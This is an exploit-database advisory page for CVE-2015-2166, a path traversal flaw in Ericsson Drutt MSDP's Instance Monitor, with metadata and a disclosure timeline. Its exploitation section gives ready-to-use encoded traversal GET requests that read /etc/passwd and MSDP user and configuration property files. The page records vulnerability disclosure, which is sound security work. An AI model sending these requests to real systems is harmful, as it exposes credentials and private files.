header-logo
Suggest Exploit
vendor:
Drutt MSDP (Instance Monitor)
by:
Anastasios Monachos
4.3
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: Drutt MSDP (Instance Monitor)
Affected Version From: 4
Affected Version To: 6
Patch Exists: Yes
Related CWE: CVE-2015-2166
CPE: a:ericsson:drutt_msdp
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=84255https://www.infosecmatter.com/nessus-plugin-library/?id=87277https://www.infosecmatter.com/nessus-plugin-library/?id=87404https://www.infosecmatter.com/nessus-plugin-library/?id=85869https://www.infosecmatter.com/nessus-plugin-library/?id=86980https://www.infosecmatter.com/nessus-plugin-library/?id=86010https://www.infosecmatter.com/nessus-plugin-library/?id=84452https://www.infosecmatter.com/nessus-plugin-library/?id=92522https://www.infosecmatter.com/nessus-plugin-library/?id=88993https://www.infosecmatter.com/nessus-plugin-library/?id=87185
Tags: cve,cve2015,lfi,ericsson,edb,packetstorm
CVSS Metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
Nuclei References: https://www.exploit-db.com/exploits/36619https://nvd.nist.gov/vuln/detail/CVE-2015-2166http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.htmlhttps://www.exploit-db.com/exploits/36619/
Nuclei Metadata: {'max-request': 1, 'vendor': 'ericsson', 'product': 'drutt_mobile_service_delivery_platform'}
Platforms Tested: None
2015

Ericsson Drutt MSDP (Instance Monitor) – Directory Traversal Vulnerability and Arbitrary File Access

Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.

Mitigation:

Vendor provided patch
Source

Exploit-DB raw data:

+------------------------------------------------------------------------------------------------------+
+ Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal Vulnerability and Arbitrary File Access +
+------------------------------------------------------------------------------------------------------+
Affected Product: Ericsson Drutt MSDP (Instance Monitor)
Vendor Homepage  : www.ericsson.com
Version    : 4, 5 and 6 
CVE v2 Vector  : AV:N/AC:L/Au:N/C:P/I:N/A:N
CVE    : CVE-2015-2166
Discovered by  : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched    : Yes

+-------------+
+ Description +
+-------------+
Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf.

The identified vulnerability affects the Instance Monitor component and allows a unauthenticated remote attacker to access arbitrary files on the file system. 

+----------------------+
+ Exploitation Details +
+----------------------+
This vulnerability can be triggered via a simple, similar to the below HTTP GET request(s):

  http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
  http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt/drutt/msdp/manager/conf/props/msdp-users.properties
  http://<drutt>:<port>/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/opt/drutt/msdp/manager/conf/ccContext.properties

+---------------------+
+ Disclosure Timeline +
+---------------------+
17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback
24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office
24.Feb.2015 - Contacted Corporate Security Office team
02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel
02.Mar.2015 - Shared vulnerability details
06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches
08.Mar.2015 - Agreed on public disclosure timelines
12.Mar.2015 - Patches released
31.Mar.2015 - Public disclosure

Navigation

Suggest Exploit

Services By CQR